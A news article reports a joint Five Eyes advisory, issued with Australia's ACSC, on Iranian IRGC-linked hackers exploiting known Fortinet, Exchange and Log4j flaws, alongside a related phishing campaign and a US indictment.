The Australian Cyber Security Centre (ACSC) has joined forces with other Five Eyes nations to issue a joint advisory regarding ongoing Iranian state-sponsored cyber threats. Issued on September 15, the advisory warns that malicious cyber activity by advanced persistent threat (APT) actors connected with Iran’s Islamic Revolutionary Guard Corps (IRGC) is on the rise.
“The IRGC-affiliated actors are actively targeting a broad range of targeted entities, including entities across multiple US critical infrastructure sectors as well as the United Kingdom, Australian and Canadian organizations,” the advisory reads. “The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.”
Those known vulnerabilities include previously publicised flaws in Fortinet and Microsoft Exchange. In addition, authorities report Iranian affiliated APT actors are actively exploiting VMware Horizon Log4j vulnerabilities for initial access, and also Log4j2 vulnerabilities in SysAid applications.
“Based on the latest intelligence across the Five Eyes, this advisory again underscores that organisations of all sizes continue to be targeted by capable and increasingly sophisticated adversaries,” said ACSC Head Abigail Bradshaw
The Five Eyes nations previously issued an alert regarding Iranian Government-sponsored APT cyber-actors in November 2021. Since then, the hacking attempts have continued. The latest advisory notes that the hackers often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran and Afkar System Yazd Company, based in Yazd, Iran.
While Fortinet FortiOS and Microsoft Exchange server vulnerabilities remain a favoured method to gain initial access, the ACSC says that APT actors have used CVE-2021-34473 in Australia. The access is then leveraged for further malicious activities, including deploying tools to support ransom and extortion operations and extract data.
“After gaining access to a network, the IRGC-affiliated APT actors likely determine a course of action based on their perceived value of the data,” the advisory says. “The actors may sell the data or use the exfiltrated data in extortion operations or double extortion ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.”
In the same week the Five Eyes joint advisory was issued, reports out of the US say Iranian-affiliated APT actors are targeting individuals with known interests in Middle Eastern affairs, nuclear security, and genome research.
Cybersecurity firm Proofpoint says an IRGC-sponsored phishing email campaign is now underway using sock puppet accounts to impersonate genuine individuals at institutions like Pew Research Center, the Foreign Policy Research Institute, and Chatham House.
On September 14, the US Department of Justice (DOJ) indicted three Iranians alleged to have conducted cyber-attacks against critical infrastructure located in the US and elsewhere. The DOJ alleges the individuals targeted a broad range of organizations, including small businesses, government agencies, non-profit programs and educational and religious institutions.
“The Government of Iran has created a safe haven where cyber criminals acting for personal gain flourish and defendants like these can hack and extort victims, including critical infrastructure providers,” said Assistant Attorney General Matthew G. Olsen of the DOJ’s National Security Division. “This indictment makes clear that even other Iranians are less safe because their own government fails to follow international norms and stop Iranian cyber criminals.”
Thursday’s joint advisory offers a range of detection and mitigation advice and says targeted entities should report cybersecurity incidents to the ASCS and continue to monitor alerts and advisories.